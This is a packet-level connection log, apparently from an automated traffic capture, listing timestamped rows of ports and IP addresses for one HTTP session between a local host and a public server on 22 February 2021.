Feb 22, 2021 09:14:57.967077971 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.967114925 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.967700005 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967741013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967789888 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967833042 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967844009 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.967871904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967912912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.967931986 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.967984915 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.968614101 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.968652964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.968702078 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.968709946 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.968744993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.968796015 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.968811035 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.969063044 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969131947 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.969476938 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969521046 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969561100 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969587088 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.969600916 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969640970 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969660997 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.969679117 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.969789028 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.970791101 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.970837116 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.970876932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.970916033 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.970928907 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.970957041 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.970978022 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.970997095 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971216917 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.971287012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971328020 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971368074 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971389055 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.971407890 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971446037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971468925 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.971487999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.971551895 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.972168922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972212076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972253084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972285986 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.972291946 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972342014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972372055 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.972385883 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.972461939 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.973033905 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973079920 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973119020 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973167896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973174095 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.973212004 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973252058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973273039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.973371983 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.973937988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.973980904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974020958 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974061966 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974101067 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974149942 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974244118 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.974385023 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.974812984 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974864960 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974910021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974929094 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.974948883 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974992037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.974997997 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.975032091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975100994 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.975712061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975752115 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975799084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975810051 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.975843906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975882053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975922108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.975950956 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.975986004 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.976623058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976666927 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976703882 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976737022 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.976752996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976797104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976809025 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.976835012 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.976887941 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.977543116 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.977586031 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.977624893 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.977654934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.977663040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.977703094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.977714062 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.977741957 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978383064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978415966 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978439093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.978456974 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978463888 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.978493929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978526115 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.978535891 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.978559017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979324102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979362011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979372978 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.979394913 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979427099 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.979429007 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979461908 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979490042 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.979501963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.979551077 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.980175972 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980211020 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980243921 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980251074 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.980278015 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980309010 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980314016 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.980341911 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.980386972 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.981067896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981101990 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981142998 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981173038 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.981178999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981211901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981245041 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.981278896 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.981317997 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.981338978 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.982007980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982048035 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982081890 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982115030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982120991 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.982148886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982160091 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.982182980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982264042 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.982867956 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982903957 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982937098 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.982963085 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.982970953 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983004093 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983017921 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.983037949 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983091116 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.983747959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983791113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983829021 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983854055 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.983861923 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983896017 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.983906031 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.983937979 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984139919 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.984659910 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984697104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984730959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984776020 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984776974 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.984813929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984817028 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.984847069 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.984904051 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.985548973 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985599995 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985632896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985646009 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.985666037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985707045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985743046 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.985749960 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.985790014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.986443996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.986476898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.986510992 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.986542940 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.986553907 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.986576080 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.986582041 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.986608982 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987334013 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987370968 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987384081 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.987405062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987416029 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.987447023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987484932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987517118 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.987521887 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.987560987 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.988224030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.988257885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.988287926 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.988313913 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.988318920 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.988349915 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.988362074 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.988388062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989113092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989161015 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989168882 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.989196062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989207983 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.989226103 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989257097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989286900 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.989299059 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.989324093 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.990022898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990067959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990102053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990132093 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990161896 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.990163088 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990170002 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.990195990 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990355015 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.990912914 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990951061 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990982056 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.990994930 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.991014004 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991044998 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991075039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.991075039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991156101 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.991801977 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991846085 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991888046 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991900921 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.991935015 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.991970062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992001057 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992006063 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.992043018 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.992695093 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992741108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992779970 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992794037 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.992814064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992844105 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992873907 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.992892981 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.992921114 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.993577957 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993611097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993642092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993665934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.993679047 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993737936 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993767977 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.993787050 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.993817091 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:57.994498968 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.994532108 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.994563103 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:57.994617939 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.839158058 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.893498898 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987102985 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987129927 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987158060 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987176895 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987200022 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987217903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987237930 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987250090 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987253904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987318039 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987356901 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987401009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987421989 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987440109 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987457037 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987474918 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987493038 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987500906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987519026 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987523079 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987539053 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:09.987611055 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.987653971 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:09.988327026 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017365932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017407894 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017425060 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017437935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017450094 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017468929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017482042 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017498016 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017553091 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.017622948 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.017668009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017682076 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017698050 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017710924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017723083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017739058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017752886 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017767906 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.017752886 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.017795086 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.017805099 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.018635988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018661022 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018678904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018697023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018719912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018721104 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.018738985 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018764019 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018769979 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.018783092 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.018796921 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.018801928 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:15:10.019479990 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.019495964 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.019519091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.019539118 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:15:10.019561052 CET	80	49767	104.21.71.230	192.168.2.4
